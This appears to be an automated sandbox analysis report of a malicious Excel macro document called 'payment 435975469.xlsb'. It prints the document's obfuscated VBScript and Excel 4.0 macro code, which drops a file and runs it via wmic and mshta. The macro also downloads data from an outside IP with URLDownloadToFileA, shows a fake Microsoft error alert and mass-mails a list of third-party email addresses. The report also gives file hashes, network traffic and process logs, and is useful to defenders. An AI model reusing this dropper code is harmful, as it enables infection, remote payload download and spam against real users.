Set z_O_z_o_M_R_s = CreateObject("MSX" & Chr(77+1-1) & "L2" & Chr(46+1-1) & "Ser" & "ve" & "rX" & "" & "" & "MLH" & "TT" & "" & "P.6" & Chr(46+1-1) & Chr(48+1-1))

w_V_r_f_C_M_E_x = "Wsc" & Chr(114+1-1) & "" & Chr(105+1-1) & "" & "pt." & "" & "She" & "ll"
Set b_I_y_E_S_v_t = CreateObject(w_V_r_f_C_M_E_x)
a_e_c_h_A_z_A = LCase(b_I_y_E_S_v_t.expandenvironmentstrings("%USERDOMAIN%"))
o_L_I_A_k_q_M_G_N_c_H_h_E_z =LCase(Replace(b_I_y_E
                    C:\ProgramData\hgcwdJhz.txt
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):131
                    Entropy (8bit):4.3648913092077555
                    Encrypted:false
                    SSDEEP:3:YEKMChMqR2OLGTaH/iMVOcALAlLgZAMdi/RgyKIMELC2HY:YEKM3M2kGTm+2g7i//KIxn4
                    MD5:5278441B81EB2C864F606BBEF0F86A37
                    SHA1:2212E712E31250B891F90FF790DB774DA3AE6EB4
                    SHA-256:377A0FD46D6CDCDE8220D882AE1990BB5EE42473F9ADCE1EA8DFDE380B8E545B
                    SHA-512:85576DF4A8C578B407CE0B77153A0655B4F6D52F569A49101CBC8580CE7D4663CAEAB33E0EC32BA5540732B9E0DE76C07359053826251B3BBF3C10453A64E408
                    Malicious:false
                    Reputation:low
                    Preview: {"archie.hopkins@lakelandenergy.com","agallego@enequipo.es","mbrent@moorelandscapes.com","inatal@bds.org","amoran@austinmoran.com"}
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG[1].txt
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:ASCII text, with no line terminators
                    Category:downloaded
                    Size (bytes):131
                    Entropy (8bit):4.3648913092077555
                    Encrypted:false
                    SSDEEP:3:YEKMChMqR2OLGTaH/iMVOcALAlLgZAMdi/RgyKIMELC2HY:YEKM3M2kGTm+2g7i//KIxn4
                    MD5:5278441B81EB2C864F606BBEF0F86A37
                    SHA1:2212E712E31250B891F90FF790DB774DA3AE6EB4
                    SHA-256:377A0FD46D6CDCDE8220D882AE1990BB5EE42473F9ADCE1EA8DFDE380B8E545B
                    SHA-512:85576DF4A8C578B407CE0B77153A0655B4F6D52F569A49101CBC8580CE7D4663CAEAB33E0EC32BA5540732B9E0DE76C07359053826251B3BBF3C10453A64E408
                    Malicious:false
                    Reputation:low
                    IE Cache URL:http://139.59.64.195:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    Preview: {"archie.hopkins@lakelandenergy.com","agallego@enequipo.es","mbrent@moorelandscapes.com","inatal@bds.org","amoran@austinmoran.com"}
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70DEA7D3.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 286 x 48, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):2200
                    Entropy (8bit):7.860501688375939
                    Encrypted:false
                    SSDEEP:48:eB4tDhUKfyMhSkT7wudfivzzawE7y2aXihs+HjVVRsYr1n7onlfDq:Q4tDhUKfyMhBT7wefivnjEWPyhJHjvR5
                    MD5:98EB9B539D097395BD1873A5BEF2589B
                    SHA1:988221B31FB352A522DFC014CBBFC6A21902A93F
                    SHA-256:8F04C4200AEFEE50FB52F399400D73284AF6004A49DFC343183F4C87CD9C2C5D
                    SHA-512:340E6C1B3A6123B75686034AAADAD19033929A3EC08024CAA46D95CB205A36A98A761AA70A356065237624B61CCEC4B07042F5DDE35D628770E4B304D3679406
                    Malicious:false
                    Reputation:low
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5C797B8.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 237 x 336, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):60538
                    Entropy (8bit):7.970149181563435
                    Encrypted:false
                    SSDEEP:1536:2PFFxgFzx5YVqHS2YzayhpSW4vHR05Q4r5UZKUbD:RFzIsj8aipSW4vHREQ4iZKUbD
                    MD5:ABC5AD9147D307B1DADB93C7AF297C5A
                    SHA1:3658C7DDFA698CDADD1D24C6C8DC4ECF7A09D9E3
                    SHA-256:AEF2CEDE45970E5F0DCC40514D38B0D707A87FBC5943B61763EF20B4A8C0573F
                    SHA-512:D6F7C18AB4E132EAA0620FD83F7EE6C21F2B16ECA70267770C6F8499B18DEE24B3849E9ADDFAA76DA1A4CB13BDB81F1F49DF77CC3BF0146EE68E0CE6860839AA
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    C:\Users\user\AppData\Local\Temp\57FF.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Excel 2007+
                    Category:dropped
                    Size (bytes):91252
                    Entropy (8bit):7.9093007405805285
                    Encrypted:false
                    SSDEEP:1536:lYEilnbn7bPFFxgFzx5YVqHS2YzayhpSW4vHR05Q4r5UZKUbYWOdO:lYDbyFzIsj8aipSW4vHREQ4iZKUbYWOQ
                    MD5:AD9FF20DDE29ED2817FF306956445AE9
                    SHA1:54EF5B5E08178A16E72EDEFE27973F12652506BD
                    SHA-256:4FA5BDE971A58FF18EC69BB4F4A61416A8C839550D92A3544866EE84FA3C73EB
                    SHA-512:C2867BAFD01E0C09EF6335D6C74F89F4A5CDD8EB3284CAC8987D5262806F018694A9D0670D07D40EA556D3ED30C94430CC9E80E4A8473E6233ED75D1C393F00E
                    Malicious:false
                    Reputation:low
                    C:\Users\user\Desktop\~$payment 435975469.xlsb
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):165
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                    MD5:797869BB881CFBCDAC2064F92B26E46F
                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                    Static File Info

                    General

                    File type:Microsoft Excel 2007+
                    Entropy (8bit):7.910082269729894
                    TrID:
                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                    • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                    • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                    • ZIP compressed archive (8000/1) 5.73%
                    File name:payment 435975469.xlsb
                    File size:91467
                    MD5:751e07abc0bc08abf349a49fd8c81703
                    SHA1:ad977311af2765089b9bffb5bb03cb26c6ab874c
                    SHA256:595c56c71c91c470c05c6243e46835d1b25b15c247fcd2a025ef0369e6a6b798
                    SHA512:d1034eb70912240df56516fb475934dbfe1f3e0e3e66399aca8537a3f38aedd09b85774a1926094c57cf1bf021ea53c039fd8854900c67ec6e8290e1dfb8ba8d
                    SSDEEP:1536:UWgPFFxgFzx5YVqHS2YzayhpSW4vHR05Q4r5UZKUb9dsyn/fKnWFMnfy3n7Vgdx:V7FzIsj8aipSW4vHREQ4iZKUb9myn6nH

                    File Icon

                    Icon Hash:e4e2ea8aa4b4b4b4

                    Static OLE Info

                    General

                    Document Type:OpenXML
                    Number of OLE Files:1

                    OLE File "payment 435975469.xlsb"

                    Indicators

                    Has Summary Info:
                    Application Name:
                    Encrypted Document:
                    Contains Word Document Stream:
                    Contains Workbook/Book Stream:
                    Contains PowerPoint Document Stream:
                    Contains Visio Document Stream:
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:

                    Macro 4.0 Code

                    0,564,=FOPEN(CHAR(67) & ":\P" & CHAR(114) & "ogr" & CHAR(97) & "mData\EYCmM" & CHAR(89) & "HJOyR." & CHAR(114) & CHAR(116) & CHAR(102), 3)
                    1,564,=B7395+C9724
                    6,564,=D3413+C656
                    7,564,=B2229+C8325
                    8,564,=B9859+C4188
                    11,564,=B783+D7448
                    12,564,=D4479+D8289
                    13,564,=FOR.CELL("MeWufVIEyMSe",Sheet1!BV165:CH519, TRUE)
                    15,564,=D6867+D4507
                    16,564,=B942+C4505
                    20,564,=D2890+D6039
                    21,564,=C1812+C2969
                    22,564,=D2446+D4508
                    24,564,=B9204+B844
                    26,564,=D7498+B7358
                    27,564,=FWRITE(0,CHAR(MeWufVIEyMSe))
                    29,564,=B3493+A8819
                    31,564,=C2687+A1120
                    32,564,=A7564+C4159
                    36,564,=A9988+D5337
                    37,564,=C7631+B8648
                    38,564,=D3212+B7834
                    41,564,=NEXT()
                    52,564,=B5371+B2151
                    53,564,=EXEC("wmic proces" & CHAR(115) & " ca" & CHAR(108) & "l creat" & CHAR(101) & "" & CHAR(32) & CHAR(34) & "" & CHAR(109) & CHAR(115) & CHAR(104) & "ta " & CHAR(67) & ":\ProgramData\EYCmMYHJ" & CHAR(79) & "yR" & CHAR(46) & "rt" & CHAR(102) & "" & CHAR(34))
                    54,564,=C581+C2472
                    55,564,=B2677+C6794
                    56,564,=C2578+B5151
                    59,564,=D4802+D4315
                    62,564,=C6596+D2280
                    63,564,=D2636+D4942
                    65,564,=CALL("url" & CHAR(109) & "on", "URLDownl" & CHAR(111) & "ad" & CHAR(84) & CHAR(111) & "FileA","JJCCJ" & CHAR(74), 0, "ht" & CHAR(116) & "p://1" & CHAR(51) & "9.5" & CHAR(57) & ".6" & CHAR(52) & CHAR(46) & CHAR(49) & "95:8080/Q" & CHAR(50) & "W5" & CHAR(86) & "WUFL5" & CHAR(86) & "CMQ" & CHAR(55) & CHAR(74) & "QPETG" & CHAR(51) & CHAR(67) & CHAR(67) & "TYX72Z4R25PDG", "C:\" & CHAR(80) & "rogramData\hgcwdJhz.tx" & CHAR(116),0,0)
                    66,564,=D2676+B2127
                    67,564,=C4790+D5629
                    71,564,=D2604+A6179
                    72,564,=D4542+D8306
                    76,564,=D9056+B4534
                    77,564,=ALERT("Error!" & CHAR(32) & "Sending r" & CHAR(101) & "po" & CHAR(114) & "t to M" & CHAR(105) & "crosoft.." & CHAR(46) & "")
                    79,564,=D4868+D2331
                    80,564,=B3174+B5181
                    83,564,=D9547+A5597
                    84,564,=B8801+D8551
                    85,564,=B9247+C1043
                    87,564,=D8176+A7956
                    89,564,=B4481+A1657
                    90,564,=FOPEN(CHAR(67) & ":\Program" & CHAR(68) & CHAR(97) & "ta\hgcw" & CHAR(100) & CHAR(74) & CHAR(104) & CHAR(122) & CHAR(46) & "" & CHAR(116) & "xt",1)
                    91,564,=C2502+B3661
                    93,564,=D5591+A6932
                    94,564,=C9224+A4459
                    95,564,=A7276+B8809
                    96,564,=C8611+B788
                    97,564,=B6334+C9145
                    98,564,=B2681+B41
                    102,564,=C175+B8798
                    104,564,=D1443+A8250
                    105,564,=SEND.MAIL(EVALUATE(FREAD(US91,255)))
                    107,564,=B2268+D9660
                    110,564,=D5638+A4105
                    111,564,=B2152+C4163
                    112,564,=C2143+D1006
                    114,564,=B1216+C7027
                    115,564,=RETURN()
                    

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    Timestamp                            Source Port  Dest Port  Source IP      Dest IP
                    Nov 24, 2021 17:50:33.949981928 CET  49167        8080       192.168.2.22   139.59.64.195
                    Nov 24, 2021 17:50:34.114958048 CET  8080         49167      139.59.64.195  192.168.2.22
                    Nov 24, 2021 17:50:34.115071058 CET  49167        8080       192.168.2.22   139.59.64.195
                    Nov 24, 2021 17:50:34.115684032 CET  49167        8080       192.168.2.22   139.59.64.195
                    Nov 24, 2021 17:50:34.280561924 CET  8080         49167      139.59.64.195  192.168.2.22
                    Nov 24, 2021 17:50:34.592226028 CET  8080         49167      139.59.64.195  192.168.2.22
                    Nov 24, 2021 17:50:34.592341900 CET  49167        8080       192.168.2.22   139.59.64.195
                    Nov 24, 2021 17:51:49.594012022 CET  8080         49167      139.59.64.195  192.168.2.22
                    Nov 24, 2021 17:51:49.597973108 CET  49167        8080       192.168.2.22   139.59.64.195

                    HTTP Request Dependency Graph

                    • 139.59.64.195:8080

                    HTTP Packets

                    Session ID:0
                    Source IP:192.168.2.22
                    Source Port:49167
                    Destination IP:139.59.64.195
                    Destination Port:8080
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

                    Timestamp:Nov 24, 2021 17:50:34.115684032 CET
                    kBytes transferred:0
                    Direction:OUT
                    Data:GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 139.59.64.195:8080
                    Connection: Keep-Alive
                    Timestamp:Nov 24, 2021 17:50:34.592226028 CET
                    kBytes transferred:0
                    Direction:IN
                    Data:HTTP/1.1 200 OK
                    Server: nginx/1.0.15
                    Date: Wed, 24 Nov 2021 16:50:33 GMT
                    Content-Type: text/plain; charset=utf-8
                    Connection: keep-alive
                    Content-Length: 131
                    Data Ascii: {"archie.hopkins@lakelandenergy.com","agallego@enequipo.es","mbrent@moorelandscapes.com","inatal@bds.org","amoran@austinmoran.com"}


                    Code Manipulations

                    Statistics

                    Behavior

                    System Behavior

                    General

                    Start time:17:49:22
                    Start date:24/11/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Imagebase:0x13f990000
                    File size:28253536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:17:49:45
                    Start date:24/11/2021
                    Path:C:\Windows\System32\wbem\WMIC.exe
                    Wow64 process (32bit):false
                    Commandline:wmic process call create "mshta C:\ProgramData\EYCmMYHJOyR.rtf"
                    Imagebase:0xff1f0000
                    File size:566272 bytes
                    MD5 hash:FD902835DEAEF4091799287736F3A028
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    General

                    Start time:17:49:46
                    Start date:24/11/2021
                    Path:C:\Windows\System32\mshta.exe
                    Wow64 process (32bit):false
                    Commandline:mshta C:\ProgramData\EYCmMYHJOyR.rtf
                    Imagebase:0x13f2d0000
                    File size:13824 bytes
                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis
